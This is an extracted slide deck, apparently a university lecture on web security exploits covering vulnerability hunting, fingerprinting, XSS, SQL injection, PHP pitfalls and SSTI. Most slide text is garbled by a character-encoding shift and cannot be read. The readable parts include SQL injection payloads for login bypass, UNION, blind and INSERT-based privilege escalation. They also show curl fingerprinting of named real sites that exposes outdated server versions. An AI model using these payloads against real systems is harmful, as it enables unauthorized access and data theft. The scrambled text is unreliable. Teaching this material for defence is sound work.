Tweet
Tweet

Slide 1

Slide 1 text

$PNQVUFS4FDVSJUZBU/5645 *OOEZJOOEZUX!HNBJMDPN 8FC4FDVSJUZ&YQMPJUT

Slide 2

Slide 2 text

0VUMJOF ˙ #VHBOE7VMOFSBCJMJUZ ˙ $PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC ˙ 7VMOFSBCJMJUZ)VOUJOH ˙ $PNNPO7VMOFSBCJMJUJFT ˙ 944 ˙ 42-*OKFDUJPO

Slide 3

Slide 3 text

#VH 7VMOFSBCJMJUZ

Slide 4

Slide 4 text

#VH :PVSBQQMJDBUJPODSBTIFE

Slide 5

Slide 5 text

7VMOFSBCJMJUZ *UTBOFYQMPJUBCMFCVH

Slide 6

Slide 6 text

8FC4FDVSJUZ

Slide 7

Slide 7 text

:,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7 *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 XSS XXE SQL Injection CSRF 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I

Slide 8

Slide 8 text

4ZTUFN4FDVSJUZ

Slide 9

Slide 9 text

:,5b pR7 A½ R7 DNS R7 Webc' R7 Webâ R7 *½ˆ– R7 Webèd ¬R7 ‘£Û R7 @fv¡ R7 Struts2 OGNL RCE Rails YAML RCE XSS UXSS Padding Oracle Padding Oracle XXE DNS Hijacking SQL Injection ShellShock FastCGI RCE NPRE RCE CSRF Bit-Flipping Attack 齡❉8FC)BDLJOH⚥涸㣼䪮帱䊫CZ0SBOHFIUUQTHPPHMW40D2I

Slide 10

Slide 10 text

$PNNPO5ZQFPG7VMOFSBCJMJUZJO8FC"QQ ˙ -PHJD&SSPS ˙ 3BDF$POEJUJPO ".JTTJOH'VODUJPO-FWFM"DDFTT$POUSPM ˙ *OKFDUJPO ˙ 42-*OKFDUJPO 944 99&*OKFDUJPO $NE*OKFDUJPO  ˙ .FNPSZ$PSSVQUJPO ˙ VOTFSJBMJ[F JO1)1 DBTFTUVEZ  ˙ %FOJFEP4FSWJDF ˙ 3FHFY%P4 -PHJD#VHMFBETUP*OOJUZ-PPQ

Slide 11

Slide 11 text

7VMOFSBCJMJUZ)VOUJOH ˙ 8IJUFCPY5FTU ˙ $PEF3FWJFX ˙ #MBDLCPY5FTU ˙ (VFTTBOEUSZUPJOKFDUTPNFUIJOHUPZPVSJOQVUFMET ˙ (SBZCPY5FTU ˙ 8IJUFCPY #MBDLCPYUFTUXIFOZPVIBWFQBSUJBMPGTPVSDFDPEFPS PUIFSWFSTJPOPGTPVSDFDPEF

Slide 12

Slide 12 text

8IJUFCPY5FTU ˙ )PX  ˙ 3FBEUIFG LJOHDPEF ˙ 3FBEUIFG LJOHDPEF ˙ 3FBEUIFG LJOHDPEF ˙ BOETPPO

Slide 13

Slide 13 text

8IJUFCPY5FTU&TTFOUJBM4LJMMT5PPMT ˙ $BOZPVSFBEUIJTMBOHVBHF "SFZPVDPNQMFUFMZLOPXUIJTMBOHVBHF  ˙ *GOPU MFBSOJUBOENBTUFSJU ˙ $PNNBOEMJOFUPPMTPSZPVSGBWPSJUFNPEFSOUFYUFEJUPS ˙ 4PNFTVQFSDPPMVUJMTMJLF ˙ HSFQ BXL TFE OE ˙ .PEFSOUFYFEJUPSCVUOPUOPUFQBEXJUIPVU  ˙ 4VCMJNF5FYU 7JTVBM4UVEJP$PEF /PUFQBE 

Slide 14

Slide 14 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF ˙ 8IBUTXSPOHXJUIUIFTFDPEF  • /* PHP */
 if(!strcmp($_POST['password'], "the secret password"))
 {
 echo "You are in!\n";
 } • # shell script
 cd "/home/$USER/data" && zip backup.zip *

Slide 15

Slide 15 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF

Slide 16

Slide 16 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF

Slide 17

Slide 17 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF

Slide 18

Slide 18 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF

Slide 19

Slide 19 text

8IJUFCPY5FTU-BOHVBHFGFBUVSF )*5$0/$5'PWFSUIFSF

Slide 20

Slide 20 text

8IJUFCPY5FTU ˙ 6TFSFHVMBSFYQSFTTJPOUPMPDBUFTPNFUIJOHMPPLTEBOHFSPVT • egrep '(system|fwrite|danger_func)\(.*\$\w+.*\)' -r . • ack-grepJTBHPPEUPPM • ack --php '(new )?mysqli?_connect'

Slide 21

Slide 21 text

3FHVMBS&YQSFTTJPO ^ABC -JOFTUBSUTXJUI"#$ DEF$ -JOFFOETXJUI%&' A+ 0OF"UPJOOJUZ" A* ;FSPUPJOOJUZ" A? ;FSPPSPOF" (ABC|DEF)? "#$PS%&'PSOPUIJOH \w "MQIBCFU %JHJUT 6OEFSMJOF . "OZDIBSBDUFS [i-k3-5OAQ] 0OFPGJ K L    0 " 2

Slide 22

Slide 22 text

3FHVMBS&YQSFTTJPO (system|fwrite|danger_func)\(.*\$\w+.*\) POFPGTZTUFN GXSJUF EBOHFS@GVOD DIBSBDUFS  BOZTUSJOH BOZMFOHUI DIBSBDUFS DIBSBDUFS  <";B[@>

Slide 23

Slide 23 text

8IJUFCPY5FTU 1)1 ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOETZTUFN FYFD QBTTUISPV CBDLRVPUF ˙ TRMRVFSZNZTRM@RVFSZ NZTRMJRVFSZ 1%0FYFDVUF  ˙ MFVQMPBENPWF@VQMPBEFE@MF @'*-&4 ˙ MFJODMVTJPOSFRVJSF SFRVJSF@PODF JODMVEF JODMVEF@PODF ˙ MFPQFSBUJPOGPQFO VOMJOL MF DPQZ SFOBNF  ˙ TFTTJPONBOBHFNFOU@$00,*& @4&44*0/ TFTTJPO@TUBSU 

Slide 24

Slide 24 text

8IJUFCPY5FTU "41/&5/&5.7$ ˙ ,FFQBOFZFPOUIFDPEFXJUIUIFTFGVODUJPOT ˙ FYFDVUFTIFMMDPNNBOE1SPDFTT4UBSU $SFBUF1SPDFTT  ˙ TRMRVFSZ$PNNBOE5FYU  ˙ MFVQMPBE3FRVFTU'JMFT 1PTUFE'JMF ˙ MFPQFSBUJPO'JMF= 'JMF4ZTUFN=  ˙ TFTTJPONBOBHFNFOU4FTTJPO

Slide 25

Slide 25 text

#MBDLCPY5FTU ˙ 5SZUPJOKFDUJPOTPNFUIJOHUPBOZQPTTJCMFJOQVUFME ˙ )551IFBEFS ˙ 9'PSXBSEFE'PS ˙ 6TFS"HFOU ˙ 1045CPEZ ˙ (&5QBSBNFUFS ˙ DPPLJF

Slide 26

Slide 26 text

#MBDLCPY5FTU ˙ 8IBUUPJOKFDU  ˙ RTFDVSJUZ CVH ˙ R<>TFDVJSUZ CVH ˙ RPS ˙ R MTBM  ˙ RTDSJQUBMFSU  TDSJQU

Slide 27

Slide 27 text

*NBHJOBUJPOBOE$SFBUJWFJTZPVSQPXFS

Slide 28

Slide 28 text

8IBUCPY74#MBDLCPY ˙ #MBDLCPYNFUIPEDBORVJDLMZEFUFDUTPNFWVMOFSBCJMJUZ ˙ 42-*OKFDUJPO $NE*OKFDUJPO 8IBUFWFS*OKFDUJPO 944 FUD ˙ .PTUPG08"415PQDBOCFEFUFDUFE ˙ #VUOPUHPPEBUMPHJDCVH DSZQUPGBJMT ˙ 8IJUFCPYNFUIPEDBOOEBMMCVHBOEWVMOFSBCJMJUZ ˙ *OOJUZUJNF JOOJUZCVH ˙ *UTWFSZIBSEUPEJHWVMOFSBCJMJUZJODPNQMFYBOEIVHFTZTUFN

Slide 29

Slide 29 text

(SBZCPY5FTUJOH ˙ 8FSFBEDPEFBOEUSZUPJOKFDUJPOTPNFUIJOH ˙ 4PNFUJNFTXFEPOUIBWFGVMMTPVSDFDPEFPS POMZPMEFSWFSTJPOJTBWBJMBCMFMFBLFE ˙ 08"415PQJTFBTZUPEFUFDU OEJUSTU

Slide 30

Slide 30 text

$PMMFDU*OGPSNBUJPO

Slide 31

Slide 31 text

$PMMFDUJPO*OGPSNBUJPO ˙ 8IBUBSFXFJOUFSFTUFE  ˙ 8IBUUFDIOPMPHZTUBDLBSFPVSUBSHFUVTFE  ˙ 6OEPDVNFOUFEVOMJTUFE63-"1* ˙ 'VMMQBUIEJTDMPTVSF ˙ 7FSTJPODPOUSPMTZTUFNNBZDBVTFUPTPVSDFDPEFMFBLBHF ˙ 44-$FSUJDBUF

Slide 32

Slide 32 text

'JOHFSQSJOUJOH

Slide 33

Slide 33 text

'JOHFSQSJOUJOH ˙ 'JHVSFPVUUFDIOPMPHZTUBDLBSFZPVSUBSHFUVTJOH ˙ -BOHVBHF ˙ 'SBNFXPSL ˙ 7FSTJPO ˙ 04 ˙ )5514FSWFS

Slide 34

Slide 34 text

'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I http://eyny.com/ HTTP/1.1 302 Found X-Powered-By: PHP/5.2.17 Location: http://www67.eyny.com/index.php Content-type: text/html Date: Wed, 12 Oct 2016 16:32:22 GMT Server: Apache/2.0.59 1SFUUZPME1)1WFSTJPO "CPVUZFBSTPME

Slide 35

Slide 35 text

'JOHFSQSJOUJOH)5513FTQPOTF $ curl -I -k https://stu255.ntust.edu.tw/ntust_stu/stu.aspx HTTP/1.1 200 OK Date: Thu, 13 Oct 2016 03:10:11 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 93 8JOEPXT4FSWFS /&5'SBNFXPSL 

Slide 36

Slide 36 text

'JOHFSQSJOUJOH1)1 ˙ IUUQXXXQTDOUVFEVUX 1)1&'%E """"$' • X-Powered-By: PHP/.*

Slide 37

Slide 37 text

'JOHFSQSJOUJOH3BJMT

Slide 38

Slide 38 text

1BUI%JTDMPTVSF ˙ IUUQXIBUFWFSDPNSPCPUTUYU ˙ 5FMMTFBSDIFOHJOFUPOPUUPTFBSDITPNFQBUI ˙ 4PNFUJNFTJUSFWFBMTXIFSFJTBENJOQBOFMPSDPOHMF

Slide 39

Slide 39 text

&SSPS.FTTBHF'VMM1BUI%JTDMPTVSF ˙ 4PNFXFCTJUFTIPXTJUTFSSPSNFTTBHFUPVTFS ˙ *UNBZMFBLTPNFDPEFBOEMFQBUI PSFWFOXPSTF ˙ (PPHMFIBDLJOH1%0@@DPOTUSVDU NZTRM ˙ $POWFSUBOPSNBM(&5QBSBNFUFSUPBSSBZCZJOKFDU<>

Slide 40

Slide 40 text

&SSPS.FTTBHF'VMM1BUI%JTDMPTVSF

Slide 41

Slide 41 text

&SSPS.FTTBHF'VMM1BUI%JTDMPTVSF

Slide 42

Slide 42 text

44-$FSUJDBUF)PXEPFTJUXPSLT ˙ "TZNNFUSJD$SZQUPHSBQIZ1VCLFZ 1SJWLFZ ˙ &ODSZQUXJUI1VCLFZ EFDSZQUXJUI1SJWLFZ ˙ &ODSZQUXJUI1SJWLFZ EFDSZQUXJUI1VCLFZ ˙ 8FDBMMUIJTTJHOJOH ˙ &WFSZDFSUJDBUFIBTBBTZNNFUSJDDSZQUPLFZ ˙ :PVDBOVTFBDFSUUPTJHOBOPUIFSDFSU ˙ :PVSDPNQVUFSIBTTPNFCVJMUJOSPPUDFSU8FDBMMJU$" ˙ :PVUSVTUPOF$" UIFOZPVUSVTUUIFDFSUTTJHOFECZJU

Slide 43

Slide 43 text

44-$FSUJDBUF*OBDFSUJDBUF ˙ 5IFNPTUJNQPSUBOUFMEJTDBMMFEDPNNPOOBNF $/  ˙ YWGPSNBUTVQQPSU4VCKFDU"MUFSOBUJWF/BNFGFBUVSFUIBUBMMPX ZPVQVUEJFSFOUEPNBJOJOPOFDFSU

Slide 44

Slide 44 text

44-$FSUJDBUF

Slide 45

Slide 45 text

7FSTJPO$POUSPM4ZTUFN ˙ 4PNFUJNFT ZPVPQFO'JMF;JMMBBOEESBHFOUJSFGPMEFSUPTFSWFS ˙ TWO ˙ HJU ˙ 8IBUDPOUBJOTJOBHJUSFQPTJUPSZ  ˙ "UPPMUPEPXOMPBEHJUGSPN)551TFSWFS ˙ IUUQTHJUIVCDPNEFOOZTDSBCCMF

Slide 46

Slide 46 text

$PNNPO7VMOFSBCJMJUJFT

Slide 47

Slide 47 text

944 ˙ )5.-*OKFDUJPO +BWB4DSJQU*OKFDUJPO ˙ $MPTFDVSSFOUBUUSJCVUFUBHBOEJOKFDUTPNFTDSJQU ˙ JNHTSDIUUQJNHVSDPN\*%^QOH ˙ QDMBTTNTH\.&44"(&^Q ˙ 5XP5ZQFT ˙ 3FFDUFE944944QBZMPBEGSPNUIFJOQVUFMET ˙ 4UPSFE944944QBZMPBETUPSFEPOUIFTFSWFS

Slide 48

Slide 48 text

944 ˙ )PXUPEFGFOTF  ˙ 3FNPWFBMMIUNMUBHTGSPNVTFSJOQVU ˙ )5.-FOUJUZFODPEF

Slide 49

Slide 49 text

9443FBMDBTFMJNJUFEMFOHUI944 ˙ 3FBMDBTFJO"*4 4DPSFCPBSEGSPN,PSFBO#P#QSPKFDUMFDUVSFS ˙ IUUQTWVMTFDVSJUZOUVTUMJNJUFEYTT

Slide 50

Slide 50 text

42-*OKFDUJPO ˙ $PODBUJOQVUFMETBOE42-TUBUFNFOUXJUIPVUQSPQFSTBOJUJ[F

Slide 51

Slide 51 text

42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}' AND password = '{$PWD}' • payload => ' or 2 <3# • result => SELECT * FROM users WHERE
 name = '' or 2 <3 #' AND password = 'asjdf'

Slide 52

Slide 52 text

42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}' AND password = '{$PWD}' • payload => ' UNION SELECT 1, 2, 3# • result => SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,3
 #' AND password = 'asjdf' 6/*0/4&-&$5

Slide 53

Slide 53 text

42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}' AND password = '{$PWD}' • payload => ' UNION SELECT 1,2,' SELECT * FROM users WHERE
 name = '' UNION SELECT 1,2,'

Slide 54

Slide 54 text

42-*OKFDUJPO&YQMPJUT • SELECT * FROM users WHERE
 name = '{$USR}' AND password = '{$PWD}' • payload => ' OR ASCII(SUBSTR(name, 1, 1)) > 64 # • result => SELECT * FROM users WHERE
 name = '' OR ASCII(SUBSTR(name, 1, 1)) > 64
 #' AND password = 'asjdf' #MJOE*OKFDUJPO

Slide 55

Slide 55 text

42-*OKFDUJPO&YQMPJUT • INSERT INTO users (id, name, password, is_admin)
 VALUES (NULL, '{$USR}', '{$PWD}', 0); • payload => inndy', 'pass', 1) # • result => INSERT INTO users
 (id, name, password, is_admin)
 VALUES (NULL, 'inndy', 'pass', 1) #', 'xxx', 0); *OTFSU

Slide 56

Slide 56 text

42-*OKFDUJPO&YQMPJUT %FNPTRMNBQBEWBODFEVTBHF

Slide 57

Slide 57 text

42-*OKFDUJPO&YQMPJUT ˙ 5IJOLPOFNJMMJPOUJNFTCFGPSFFYQMPJUBXJME42-JWVM ˙ 5IJOLBCPVUJU JG42-TUBUFNFOUMPPLTMJLFCFMPX • DELETE FROM article WHERE id = '{$ID}'; • UPDATE SET nickname = '{$NICK}' WHERE id = '{$ID}';

Slide 58

Slide 58 text

42-*OKFDUJPO&YQMPJUT 8FMM *UTB61%"5&%&-&5&TUBUFNFOU

Slide 59

Slide 59 text

42-*OKFDUJPO5SVF5SBHJD4UPSZ 4PNFEBZGCDPNHSPVQT/56IFBE

Slide 60

Slide 60 text

42-*OKFDUJPO5SVF5SBHJD4UPSZ

Slide 61

Slide 61 text

42-*OKFDUJPO5SVF5SBHJD4UPSZ

Slide 62

Slide 62 text

42-*OKFDUJPO&YQMPJUT ˙ :FUBOPUIFSUSVFTUPSZ ˙ "CPVU.BQMF4UPSZQSJWBUFTFSWFS

Slide 63

Slide 63 text

0UIFS7VMOFSBCJMJUZ.JTD

Slide 64

Slide 64 text

#BE&ODPEJOH

Slide 65

Slide 65 text

65'5IFCBEDIBS

Slide 66

Slide 66 text

#BE&ODPEJOH ˙ 8IFOZPVUSZEFDPEFTPNFCZUFTEBUBUPVOJDPEF JOWBMJE CZUFTTFRVFODFXJMMCFDPOWFSUUPVOJDPEF=VGE ˙ =Y&'=Y#'=Y#%JO65' ˙ *UNBZDBVTFTPNFUSPVCMF

Slide 67

Slide 67 text

0QFO$5'ˋ.JTDSBOEEVNC ˙ IUUQTHJTUHJUIVCDPN*OOEZBDCGEEGCFGDDGF • /* TL; DR */
 var x = genearte_random_bytes(); // Buffer
 x = String.fromCharCode(x.length) + x; // String + Buffer = String
 var token = Base64.encode(x);

Slide 68

Slide 68 text

85'1)1

Slide 69

Slide 69 text

85'1)1&RVBMJUZ ˙ NE 2/,$%;0 NE 

Slide 70

Slide 70 text

85'1)1VOTFSJBMJ[F ˙ $MBTT@@XBLFVQ ˙ $MBTT@@EFTUSVDU ˙ VOTFSJBMJ[FTVDLTVTFBGUFSGSFFJOVOTFSJBMJ[F ˙ /FWFS &WFSVOTFSJBMJ[FTPNFUIJOHGSPNVOUSVTUFETPVSDF ˙ 6TF+40/

Slide 71

Slide 71 text

85'1)1FYUSBDU ˙ %FGBVMUCFIBWJPSJTPWFSXSJUFBMMFYJTUFEWBSJBCMFT ˙ FYUSBDU TUNURVFSZ GFUDI$PMVNO JUTWFSZDPNNPO

Slide 72

Slide 72 text

85'1)1QBTTXPSE@IBTI ˙ QBTTXPSE@IBTI QBTTX=SE 1"44803%@%&'"6-5  ˙ OVMMCZUFUSVODBUJPOXIJMFIBTIJOHQBTTXPSE

Slide 73

Slide 73 text

85'1)1BSHVNFOUUZQF ˙ JG TUSDNQ @(&5<QBTTXPSE> QBTTXPSE FDIP1BTT

Slide 74

Slide 74 text

4FSWFS4JEF5FNQMBUF*OKFDUJPO

Slide 75

Slide 75 text

445* ˙ *UT UIFBHFPG.7$ ˙ #VHCPVOUZ+JOKB445*JO6CFSSFQPSUFECZ0SBOHF ˙ 5SFOEZJO$5'T ˙ 44$5''MBH.BO ˙ 4&$6*/4*%&4##4 ˙ )*5$0/$5'4FDVSF1PTU ˙ 4BOECPYNFDIBOJTNJONBOZUFNQMBUFFOHJOF  ˙ 4JNQMF5SJDL<>@@DMBTT@@@@NSP@@<>@@TVCDMBTTFT@@

Slide 76

Slide 76 text

445* ˙ &YQMPJUVOQJDLMFVOTFSJBMJ[F JO1ZUIPO ˙ &YQMPJUMF UIFODPOHGSPN@QZMF

Slide 77

Slide 77 text

)PXUPXSJUFB1)1XFCTIFMM ˙ 5SJWJBM • ˙ "MJUUMFDPOGVTF • ˙ )FSFJTNZGBWPSJUF TIBSFXJUIZPV •